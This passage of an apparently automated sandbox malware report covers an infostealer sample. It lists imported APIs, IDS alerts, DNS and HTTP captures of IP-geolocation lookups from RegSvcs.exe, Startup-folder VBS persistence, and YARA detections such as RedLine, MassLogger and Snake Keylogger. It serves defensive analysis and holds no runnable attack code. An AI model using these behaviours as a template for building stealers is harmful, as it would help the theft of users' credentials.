SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T01:14:30.202807+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	158.101.44.242	80	TCP
2025-01-11T01:14:39.015352+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49706	158.101.44.242	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:14:26.363017082 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:26.368653059 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:26.368731022 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:26.369175911 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:26.374346972 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:28.798516035 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:28.843436956 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:28.892329931 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:28.897147894 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:30.151648045 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:30.161396027 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:30.161449909 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:30.161642075 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:30.202806950 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:30.213188887 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:30.213207960 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:30.684880972 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:30.685035944 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:31.026061058 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:31.026087046 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:31.026479006 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:31.077761889 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:31.316478014 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:31.359335899 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:31.430946112 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:31.431004047 CET	443	49705	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:31.431195021 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:31.472158909 CET	49705	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:37.168097973 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:37.173065901 CET	80	49706	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:37.173506021 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:37.173731089 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:37.178513050 CET	80	49706	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:37.790786982 CET	80	49706	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:37.795593977 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:37.800501108 CET	80	49706	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:38.964556932 CET	80	49706	158.101.44.242	192.168.2.8
Jan 11, 2025 01:14:38.966476917 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:38.966522932 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:38.966656923 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:38.971189976 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:38.971204042 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:39.015352011 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:14:39.465476990 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:39.465570927 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:39.469461918 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:39.469471931 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:39.469887972 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:39.515338898 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:40.065301895 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:40.107333899 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:40.189831972 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:40.189963102 CET	443	49708	104.21.112.1	192.168.2.8
Jan 11, 2025 01:14:40.190057039 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:14:40.192646980 CET	49708	443	192.168.2.8	104.21.112.1
Jan 11, 2025 01:15:35.169497967 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:15:35.169569016 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:15:43.964767933 CET	80	49706	158.101.44.242	192.168.2.8
Jan 11, 2025 01:15:43.964869976 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:16:10.156471968 CET	49704	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:16:10.163930893 CET	80	49704	158.101.44.242	192.168.2.8
Jan 11, 2025 01:16:18.969166040 CET	49706	80	192.168.2.8	158.101.44.242
Jan 11, 2025 01:16:18.973988056 CET	80	49706	158.101.44.242	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:14:26.342998028 CET	55956	53	192.168.2.8	1.1.1.1
Jan 11, 2025 01:14:26.350414038 CET	53	55956	1.1.1.1	192.168.2.8
Jan 11, 2025 01:14:30.153439999 CET	57608	53	192.168.2.8	1.1.1.1
Jan 11, 2025 01:14:30.160495996 CET	53	57608	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 01:14:26.342998028 CET	192.168.2.8	1.1.1.1	0xd4d5	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.153439999 CET	192.168.2.8	1.1.1.1	0x82ba	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 01:14:26.350414038 CET	1.1.1.1	192.168.2.8	0xd4d5	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 01:14:26.350414038 CET	1.1.1.1	192.168.2.8	0xd4d5	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:26.350414038 CET	1.1.1.1	192.168.2.8	0xd4d5	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:26.350414038 CET	1.1.1.1	192.168.2.8	0xd4d5	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:26.350414038 CET	1.1.1.1	192.168.2.8	0xd4d5	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:26.350414038 CET	1.1.1.1	192.168.2.8	0xd4d5	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:14:30.160495996 CET	1.1.1.1	192.168.2.8	0x82ba	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	158.101.44.242	80	5084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:14:26.369175911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 01:14:28.798516035 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:14:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b726f5e157218827d5b12bced14e6404 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 01:14:28.892329931 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 01:14:30.151648045 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:14:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5e3616f5fb4e42864e94000dcce7f5fa Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	158.101.44.242	80	4200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:14:37.173731089 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 01:14:37.790786982 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:14:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1a0abbbb098b5a13231ac444dbf0097f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 01:14:37.795593977 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 01:14:38.964556932 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:14:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9d72016306abb6bc8b253b6b8e8f04b0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	104.21.112.1	443	5084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:14:31 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 00:14:31 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:14:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1869260 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GM%2FwLhz8FDlzD%2Bde045mpaEg%2FPjUa40SdWbZ1cWHKWn3a07DD50ofcgpIPy3pINUD%2F8qUTI6OWdICN3Z0rS2vuqEwUjHBbZqKCX42rgM%2BJai9SAs2ZVkuIjosioi2iX%2FGU9TTh%2FE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000b50608c6729f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1984&min_rtt=1978&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1440552&cwnd=169&unsent_bytes=0&cid=028056de3ae7dd78&ts=759&x=0"
2025-01-11 00:14:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	104.21.112.1	443	4200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:14:40 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 00:14:40 UTC	855	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:14:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1869269 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vaN8JFtFMGZXoRFe%2BpaPuH5YzPZhbpXdbOp9shZlsHvFN62HyjKy1916QPCQrQQQZ8pHo7%2Fe0HeKAQ8pHD0G72kdL919B2vCezqM4kJuwXlx7O8gFOLrZkO9%2B6Z6ozz3kSunaEqj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000b53cb9b30f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1601&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1802469&cwnd=221&unsent_bytes=0&cid=461dc400d8da7048&ts=738&x=0"
2025-01-11 00:14:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	19:14:20
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\yqfze5TKW7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yqfze5TKW7.exe"
Imagebase:	0x620000
File size:	1'094'144 bytes
MD5 hash:	30FB530DA7CF794B61893DF575122863
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	19:14:21
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yqfze5TKW7.exe"
Imagebase:	0xfe0000
File size:	1'094'144 bytes
MD5 hash:	30FB530DA7CF794B61893DF575122863
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1530661018.0000000003580000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs Detection: 49%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	19:14:23
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\yqfze5TKW7.exe"
Imagebase:	0x4f0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2748823717.00000000039E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2746395649.0000000002650000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2747027909.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2746643773.00000000027D0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	19:14:32
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\porcelainization.vbs"
Imagebase:	0x7ff72f5a0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:14:33
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\underbalance\porcelainization.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\underbalance\porcelainization.exe"
Imagebase:	0xfe0000
File size:	1'094'144 bytes
